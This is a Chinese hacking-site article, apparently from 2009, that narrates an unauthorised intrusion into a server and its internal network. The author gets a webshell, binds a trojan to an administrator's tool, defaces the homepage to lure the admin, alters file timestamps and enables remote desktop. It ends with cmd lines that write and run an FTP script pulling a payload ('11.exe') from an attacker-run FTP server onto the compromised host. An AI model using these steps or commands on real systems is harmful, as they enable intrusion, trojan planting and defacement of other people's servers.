热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

内网渗透入侵服务器全过程

发布时间:2009-08-16 18:15文章来源:网络文章作者:樱花浪子 点击次数:
摘要:经常在一些BBS里和一些杂志里看到,渗透XX网站, 其实就是拿了扔了一个WEBSHELL在上面,严格来说这根本算不上渗透。因为当你进了XX内网面对N多的机器的时候,才知道,内网是多么的庞大。下面我们先来看两张内网的拓扑结构图,图1, 图2所示。如果有的朋友现在...

经常在一些BBS里和一些杂志里看到,渗透XX网站,其实就是拿了扔了一个WEBSHELL在上面,严格来说这根本算不上渗透。因为当你进了XX内网面对N多的机器的时候,才知道,内网是多么的庞大。下面我们先来看两张内网的拓扑结构图,图1,

图2所示。如果有的朋友现在还不了解路由器和交换机等什么意思,那应该好好补习一下了。这里在说一下什么叫内网,可能有的朋友认192.168.1.x这样的形式就是内网,前段时间QQ上一朋友挂出一台机器,告诉我有内网,我问他怎么判断的,他说执行ipconfig /all的时候看见内网地址了,其实这样判断太过草率,比如说我为了安全,我自己买了一个路由器那么在我的电脑执行ipconfig /all的时候IP地址也是内网,其实我有内网吗?是没有的。

  在渗透内网之前我们先来了解一下局域网常见的拓扑结构,网络中的计算机等设备要实现互联,就需要以一定的结构方式进行连接,这种连接方式就叫做"拓扑结构",通俗地讲这些网络设备如何连接在一起的。目前常见的网络拓扑结构主要有以下四大类:1、星型结构,2、环型结构,3、总线型结构,4、星型和总线型结合的复合型结构。因为文章是讨论渗透内网的,所以每种的详细介绍,我就不列出来了,大家简单了解下就可以了,有兴趣的可以每一种都百度下。

  可能刚入门的朋友不是很了解为什么内网而我们还能访问到呢,现在很多服务器都是用了硬件防火墙作的映射,也就是说他的所有服务器其实都在防火墙以后并且没有外网IP,可能有人会说,没有外网IP那我们访问它网站用的IP是什么呢?如果使用硬件防火墙配置过这种环境过朋友就明白了,这是现在很多包括国内大公司流行的NAT配置方法,这样相对来说比较安全,这样就需要我们在渗透的时候做端口映射。

  下面我把以前入侵渗透的几次内网过程并把一些思路,一些高手们的渗透经验,和一些用到或没用到的工具都综合的说一下。首先是通过脚本漏洞获得了一个WEBSHELL,服务器开的端口有21和80,并没有开过多的端口,没有装SU,pcAnywhere等第三方软件,wscript.shell为真,上传CMD能执行一些简单的命令,其他脚本木马权限一样,这台服务器上面就两个站,目录权限不是很严,发现D盘下有一个字符替换器,如图3所示。 直接把下回本地看看是什么东东,原来是一个查找字符的工具, 如图4所示。

  莫非这站以前让人搞过,管理员用来查找被改文件的,试了一下可以改名, 如图5, 那么好办了,我直接捆了一个木马在上面,把这个删掉,等着管理员上线吧,等了两天管理员还是没有上线,这么等下去也不是办法,只好把首页涂了,告诉他网站有漏洞,已被人植入木马,请查找木马之类的,并修改了几个重要文件的时间,果然管理员上线了。如图6。

  执行ipconfig /all果然有内网IP,图7。 既然没开终端太不方便,我直接帮它开了吧,后来这台机器我又做了VPN,开3389可以用手工和工具都可以的,这里带给大家二个开3389的工具,都还比较不错,一个是火狐的开3389的工具,另一个是特南克斯,这里我用的是特南克斯的,至于怎么把程序传到肉鸡上办法很多,可以用远程程序直接传,也可以在本机架FTP服务器,用到20cn的FTP服务器,图8。 设置好用户和密码后cmdshell里执行:

echo o 你架设FTP的IP>ftp.txt
echo hacklu>>ftp.txt       //写入ftp.txt用户名
echo 123456>>ftp.txt      //写入ftp.txt密码
echo bin>>ftp.txt       //二进制方式转输
echo get 11.exe>>ftp.txt   //将11.exe下载到肉鸡
echo bye>>ftp.txt      //断开FTP
type ftp.txt        //查看写入是否有错误 
ftp -s:ftp.txt              //执行FTP.TXT里的内容

标签分类: 网络攻防

上一篇:Linux下的远程控制Windows——Rdesktop
下一篇:黑客再爆Linux内核高危漏洞